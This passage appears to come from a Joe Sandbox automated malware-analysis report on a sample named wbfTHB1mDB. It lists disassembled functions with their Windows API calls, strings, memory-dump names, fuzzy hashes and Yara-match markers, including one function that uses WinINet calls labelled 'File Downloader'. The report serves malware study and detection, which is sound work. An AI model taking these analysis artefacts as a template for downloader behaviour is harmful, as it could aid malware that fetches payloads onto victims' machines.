FlsSetValue.KERNEL32 ref: 00007FF6A7060B00

Part of subcall function 00007FF6A70604DC: HeapAlloc.KERNEL32(?,?,00000000,00007FF6A7060BD6,?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000), ref: 00007FF6A7060531

FlsSetValue.KERNEL32 ref: 00007FF6A7060B28

Part of subcall function 00007FF6A7060554: RtlFreeHeap.NTDLL(?,?,00000000,00007FF6A7060C21,?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000), ref: 00007FF6A706056A
Part of subcall function 00007FF6A7060554: GetLastError.KERNEL32(?,?,00000000,00007FF6A7060C21,?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000), ref: 00007FF6A7060574

FlsSetValue.KERNEL32 ref: 00007FF6A7060B39
FlsSetValue.KERNEL32 ref: 00007FF6A7060B4A

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 1e41568088f52e644b31898b0bd17a5a6d325f530ffdd94440ff6c92a5c92b21
Instruction ID: 61b8e440f7c5dd56f2512ee98eed78e8df8fcbe3671bf6a177bf4b94cf1e01df
Opcode Fuzzy Hash: 1e41568088f52e644b31898b0bd17a5a6d325f530ffdd94440ff6c92a5c92b21
Instruction Fuzzy Hash: 1241AFA0F8F60346F9696F3159B157A61824F547B4F145B34E83ECA3C6EEECF6A18200

Function 00007FF6A70416C0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6A70416FD
RtlImageNtHeader.NTDLL ref: 00007FF6A704171D
RtlGetNtVersionNumbers.NTDLL ref: 00007FF6A704177A
RtlGetNtVersionNumbers.NTDLL ref: 00007FF6A70417B7
RtlImageNtHeader.NTDLL ref: 00007FF6A7041822
RtlImageNtHeader.NTDLL ref: 00007FF6A704187B
RtlGetNtVersionNumbers.NTDLL ref: 00007FF6A7041914

Strings

ntdll.dll, xrefs: 00007FF6A70416F3
.mrdata, xrefs: 00007FF6A70417D6
.data, xrefs: 00007FF6A704170A

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: HeaderImageNumbersVersion$HandleModule
String ID: .data$.mrdata$ntdll.dll
API String ID: 389246363-825320017
Opcode ID: ad4b1c0749fa3893729116aa8c799c12bbef0251717b69bc78c060cccdf372d6
Instruction ID: 56b220444566e057573dc4fa0ab8b8bed7a2668f945b0ebb80d0d90a95e222c6
Opcode Fuzzy Hash: ad4b1c0749fa3893729116aa8c799c12bbef0251717b69bc78c060cccdf372d6
Instruction Fuzzy Hash: A29126B2B06A4199FB50CF61D9442BD37B1BB68B48F44053ACE0DE7B98DF38A965D340

Function 00007FF6A704FAE0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 108COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704FC44
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704FC51
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704FC5E
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704FC6B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704FC78

Strings

Can not switch from automatic to manual indexing, xrefs: 00007FF6A704FC4A
Can not switch from manual to automatic indexing, xrefs: 00007FF6A704FC71
Precision not allowed for this argument type., xrefs: 00007FF6A704FC3D
Invalid format string., xrefs: 00007FF6A704FC64
Number is too big, xrefs: 00007FF6A704FC57

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
API String ID: 909987262-435359029
Opcode ID: 08573abdc2a186ac1af95c93dda87a7c9d128e6faae08f844816f6107c08fc17
Instruction ID: 1701502fc1401641215ae54c2b8f7bd4537f38a769881c5d59cc96beef21bdb8
Opcode Fuzzy Hash: 08573abdc2a186ac1af95c93dda87a7c9d128e6faae08f844816f6107c08fc17
Instruction Fuzzy Hash: 7F4117A2A0E98986EA25CF38C1612BD33A1FF61744F984532D75DC21E6DF2CF5A1D740

Function 0000018C89A9FDCC Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 407COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89A9FDFB
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89A9FECB

Strings

0, xrefs: 0000018C89A9FEF5
0, xrefs: 0000018C89A9FF07
0, xrefs: 0000018C89A9FE9D

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0$0$0
API String ID: 3215553584-3137946472
Opcode ID: c13ea352d321776aceeea9581779599aef3778c14aa0c6b54d648fb53a65a266
Instruction ID: 029851d478def61aa50689e42ddba19c8004229e77373cf4aa1d2b47ed842d37
Opcode Fuzzy Hash: c13ea352d321776aceeea9581779599aef3778c14aa0c6b54d648fb53a65a266
Instruction Fuzzy Hash: E2E105325856A58AF7608F28C4D03EDBBD5E323B84F54C022D79647386CF399A5EC3A4

Function 00007FF6A7042B10 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6A7042B8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF6A7042BD5
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A7042D51
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A7042D64
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A7042D6A

Strings

bad locale name, xrefs: 00007FF6A7042D57
true, xrefs: 00007FF6A7042C8C
false, xrefs: 00007FF6A7042C5D

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: f2f676a565f09d11e56bcdec2049853dbd75c07a87b5aee6448638d9ac0d1cf9
Instruction ID: 240dc54b3bb28f706570c57193cd62a22b4dabe000ec8765c83b80d951f9feaa
Opcode Fuzzy Hash: f2f676a565f09d11e56bcdec2049853dbd75c07a87b5aee6448638d9ac0d1cf9
Instruction Fuzzy Hash: DA716C62B0AB418AEB15EF70E4502AC33B5EF94748F044535DE4DE7B9ADE38E521D348

Function 0000018C89A84C60 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A84CDD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000018C89A84D25
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A84EA1
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A84EB4
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A84EBA

Strings

bad locale name, xrefs: 0000018C89A84EA7
false, xrefs: 0000018C89A84DAD
true, xrefs: 0000018C89A84DDC

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name$false$true
API String ID: 164343898-1062449267
Opcode ID: 29efca81b51b36b0bdee8129b0dc58a6a03c076b05ce7172931552b8d959c521
Instruction ID: 99f582cdfe8900b1d6f84132e307370d1c13ea516c80b763ecea5aa27a98a53f
Opcode Fuzzy Hash: 29efca81b51b36b0bdee8129b0dc58a6a03c076b05ce7172931552b8d959c521
Instruction Fuzzy Hash: 7B716D32741B408AFB15DFB0D4503EC37B6EB86B08F15C1299E4967B99DF34862AC3A5

Function 00007FF6A704E230 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 136COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E3F3
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E400

Strings

Can not switch from automatic to manual indexing, xrefs: 00007FF6A704E3DF
Can not switch from manual to automatic indexing, xrefs: 00007FF6A704E3F9
Invalid format string., xrefs: 00007FF6A704E3D2
Number is too big, xrefs: 00007FF6A704E3EC

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
API String ID: 909987262-180087107
Opcode ID: 068709c7c03d6538d661d64badbd28962f5457fdc8ef99600b1a680d32a5ac92
Instruction ID: 1b4dd484f19f34e386398d4a4ffff43750dbaaa3e22fe9be80e4083b4eb51da8
Opcode Fuzzy Hash: 068709c7c03d6538d661d64badbd28962f5457fdc8ef99600b1a680d32a5ac92
Instruction Fuzzy Hash: AE51F4B2A0D58685EB168F28D0541BC3361FFA1F49F544236E3AEC21D6DF2CE5A2D708

Function 0000018C89AABCE4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0000018C89AABE60
GetProcAddress.KERNEL32 ref: 0000018C89AABE6C

Strings

ext-ms-, xrefs: 0000018C89AABDBD
api-ms-, xrefs: 0000018C89AABDAA

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: c6120ce6c378417c8061f2daa80316ce8b84504fe2d3d9dfde353b277e126bba
Instruction ID: b3f60ecf55ee2a5b7887f11887ef202229409479c3605fb41cc67625bd0ccef2
Opcode Fuzzy Hash: c6120ce6c378417c8061f2daa80316ce8b84504fe2d3d9dfde353b277e126bba
Instruction Fuzzy Hash: 3F4117313A1A1086FA65CB16A8447D9B3D5F787BE0F49C235EE0A47794EF38C60D83A0

Function 00007FF6A7063EB8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6A70645C0,?,?,?,?,00007FF6A7073C82), ref: 00007FF6A7064034
GetProcAddress.KERNEL32(?,?,?,00007FF6A70645C0,?,?,?,?,00007FF6A7073C82), ref: 00007FF6A7064040

Strings

api-ms-, xrefs: 00007FF6A7063F7E
ext-ms-, xrefs: 00007FF6A7063F91

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 1b5fdbe1bb0740eddaadd1b93e53b15a36ff09217fdd149a8004e8997376f726
Instruction ID: 513cf561c42715e85a2c2df61a43169293003ac4f6b372dd085796c976a0d7fc
Opcode Fuzzy Hash: 1b5fdbe1bb0740eddaadd1b93e53b15a36ff09217fdd149a8004e8997376f726
Instruction Fuzzy Hash: 3941E3A1B1BA4281FE169F16AC24676A3A9BF44BD0F084135ED0DD7784EE7CE5A58340

Function 0000018C89A85090 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 0000018C89A850FB
InternetOpenUrlA.WININET ref: 0000018C89A85130
InternetReadFile.WININET ref: 0000018C89A85151
InternetReadFile.WININET ref: 0000018C89A8518F
InternetCloseHandle.WININET ref: 0000018C89A8519C
InternetCloseHandle.WININET ref: 0000018C89A851A5

Strings

File Downloader, xrefs: 0000018C89A850F4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandleOpenRead
String ID: File Downloader
API String ID: 4038090926-3631955488
Opcode ID: d760029ad861ea7f7ea2ffc299629ee0db5f3c755485599aed123bc73a668a15
Instruction ID: 332582a6671380a6865a2f833c22a917c2ec68113bf339051a653d5c9e1ca120
Opcode Fuzzy Hash: d760029ad861ea7f7ea2ffc299629ee0db5f3c755485599aed123bc73a668a15
Instruction Fuzzy Hash: 0F318D32254B8086EB20DF25E8107DAB3A1F78ABC4F44D015EE8943B58DF7DC6498BA0

Function 0000018C89AA32AC Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA32EF
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA36DC
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA3978

Strings

f, xrefs: 0000018C89AA3411
p, xrefs: 0000018C89AA33A1
p, xrefs: 0000018C89AA3419

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: da133f4d1d1d50a9f8077a7ed93c78c5851a9c9ee1111e96f3e2a2a160aeb47c
Instruction ID: bd8a971c826cfec6165fb386f674748b2178476b0eeeec9de128a6280bea2d4c
Opcode Fuzzy Hash: da133f4d1d1d50a9f8077a7ed93c78c5851a9c9ee1111e96f3e2a2a160aeb47c
Instruction Fuzzy Hash: C112D37A7442428BFB249B15E0547FAF6D1F382794F84C136E692476C4DF79CA888BB0

Function 0000018C89ABABDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000018C89ABAC0D
GetLastError.KERNEL32 ref: 0000018C89ABAC19
CloseHandle.KERNEL32 ref: 0000018C89ABAC31
CreateFileW.KERNEL32 ref: 0000018C89ABAC5C
WriteConsoleW.KERNEL32 ref: 0000018C89ABAC7B

Strings

CONOUT$, xrefs: 0000018C89ABAC3D

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 97ef1f90b5d1e549fd4d93c948d975b58c02b300c1de8e440893a5efab19f807
Instruction ID: c04eb95f8cab56640c3a30c433a8b3f08c93deeaa9da38ebe986170a2eae3ac3
Opcode Fuzzy Hash: 97ef1f90b5d1e549fd4d93c948d975b58c02b300c1de8e440893a5efab19f807
Instruction Fuzzy Hash: D6118F31354B8086E7508B56E8543E977E4F78AFE4F04C224EE5987B94DF78CA588790

Function 0000018C89ACB73C Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000018C89ACB7E9
MultiByteToWideChar.KERNEL32 ref: 0000018C89ACB885
MultiByteToWideChar.KERNEL32 ref: 0000018C89ACB92E
MultiByteToWideChar.KERNEL32 ref: 0000018C89ACB958
MultiByteToWideChar.KERNEL32 ref: 0000018C89ACBA00
CompareStringEx.KERNEL32 ref: 0000018C89ACBA4D

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID:
API String ID: 2984826149-0
Opcode ID: ab7e75f2883cad40e90fab743296f144bd79ee85a7c99ab5de0f741cdd8f7a66
Instruction ID: d6a7c3c3cf2df544f794679c55e57a62da3f4613f83636ccf549a7e56d23073c
Opcode Fuzzy Hash: ab7e75f2883cad40e90fab743296f144bd79ee85a7c99ab5de0f741cdd8f7a66
Instruction Fuzzy Hash: 66A1B3726807808AFB218B2194503ED76D1F782FACF56C611DA591BBC5DF3AC748C3A0

Function 0000018C89ACB3DC Relevance: 9.2, APIs: 6, Instructions: 206COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 0000018C89ACB44C
MultiByteToWideChar.KERNEL32 ref: 0000018C89ACB4EA
LCMapStringEx.KERNEL32 ref: 0000018C89ACB553
LCMapStringEx.KERNEL32 ref: 0000018C89ACB5A5
LCMapStringEx.KERNEL32 ref: 0000018C89ACB64A
WideCharToMultiByte.KERNEL32 ref: 0000018C89ACB6A4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: a17d41df7d4fcd83c170866fb1b58b26a6ae7521d63a390143938d7d4d5e554f
Instruction ID: 7efa0241d11befc54f253f0199c7d20d6945893997c762a4a1e4e3c5692926a7
Opcode Fuzzy Hash: a17d41df7d4fcd83c170866fb1b58b26a6ae7521d63a390143938d7d4d5e554f
Instruction Fuzzy Hash: 6E81B27224078086EB208F25E4407E977E5FB96BECF15C621EA594BBD8DF39C648C760

Function 0000018C89AA03B8 Relevance: 9.2, APIs: 6, Instructions: 157COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA042A
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA045B
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA049B
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA04DD
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA0512
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA058F

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ca3f80eaf004f362beb8f5b3b26ae04cc2cf7c865ac26bc256f85fe2d54e20e3
Instruction ID: df07ab4eb47497b27f24b8cee703bb8698e24fe148c57c85cfddc8fb1dcb97d3
Opcode Fuzzy Hash: ca3f80eaf004f362beb8f5b3b26ae04cc2cf7c865ac26bc256f85fe2d54e20e3
Instruction Fuzzy Hash: E9519F36148695CBE7629F24D4E03EDBBD1A747B44F48C021C78A07396DE398A4EC7A2

Function 0000018C89AA8374 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000018C89AA8383
FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,0000018C89AA40D5,?,?,?,?,0000018C89AAB584), ref: 0000018C89AA83B9
FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,0000018C89AA40D5,?,?,?,?,0000018C89AAB584), ref: 0000018C89AA83E6
FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,0000018C89AA40D5,?,?,?,?,0000018C89AAB584), ref: 0000018C89AA83F7
FlsSetValue.KERNEL32(?,?,-2891666E48DAA7FF,0000018C89AA40D5,?,?,?,?,0000018C89AAB584), ref: 0000018C89AA8408
SetLastError.KERNEL32 ref: 0000018C89AA8423

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: cee6373ea84a4a552c016e50248c6f8141520f535d08084ec21692085f32e33a
Instruction ID: eb7bc8c7376e284ec0c786aa418c2f459ed9dfb91632c0792d409373c70a8a90
Opcode Fuzzy Hash: cee6373ea84a4a552c016e50248c6f8141520f535d08084ec21692085f32e33a
Instruction Fuzzy Hash: B1116D303C564047FA64A7396A513FDA1D25B867B0F44C734A93647AD6DE38960893B0

Function 00007FF6A7060B74 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000,00007FF6A706BF97,?,?,?), ref: 00007FF6A7060B83
FlsSetValue.KERNEL32(?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000,00007FF6A706BF97,?,?,?), ref: 00007FF6A7060BB9
FlsSetValue.KERNEL32(?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000,00007FF6A706BF97,?,?,?), ref: 00007FF6A7060BE6
FlsSetValue.KERNEL32(?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000,00007FF6A706BF97,?,?,?), ref: 00007FF6A7060BF7
FlsSetValue.KERNEL32(?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000,00007FF6A706BF97,?,?,?), ref: 00007FF6A7060C08
SetLastError.KERNEL32(?,?,0000F362032EB126,00007FF6A706066D,?,?,?,?,00007FF6A706C66A,?,?,00000000,00007FF6A706BF97,?,?,?), ref: 00007FF6A7060C23

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 971659c83b38dd1a66ee83da3a75f24331de4a36c570b19d199c4687843c0274
Instruction ID: fa0a2da08af506c9a08c6e64f29d239e26ceb571920d31f295ba4ed3bfc1c688
Opcode Fuzzy Hash: 971659c83b38dd1a66ee83da3a75f24331de4a36c570b19d199c4687843c0274
Instruction Fuzzy Hash: B711D2A0B8F64242FA64AF316AB157961815F547B4F105734E83EC77C6EEECF6A08300

Function 0000018C89A3DB90 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 281COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 0000018C89A3DBEF

Part of subcall function 0000018C89AC9570: AreFileApisANSI.KERNEL32 ref: 0000018C89AC9582

__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A3DE97
__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A3DF51

Strings

", ", xrefs: 0000018C89A3DCDD
: ", xrefs: 0000018C89A3DCAA

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: __std_exception_destroy$ApisFile__std_fs_code_page
String ID: ", "$: "
API String ID: 741338541-747220369
Opcode ID: 70c3df3b0665392bb10dec36982789de03aed693fc70c4f23570ae3ae5983821
Instruction ID: 0a1464a5470a40d63a563c84d66d460ea3fdea6c6d7245b22b9d68dd9707449a
Opcode Fuzzy Hash: 70c3df3b0665392bb10dec36982789de03aed693fc70c4f23570ae3ae5983821
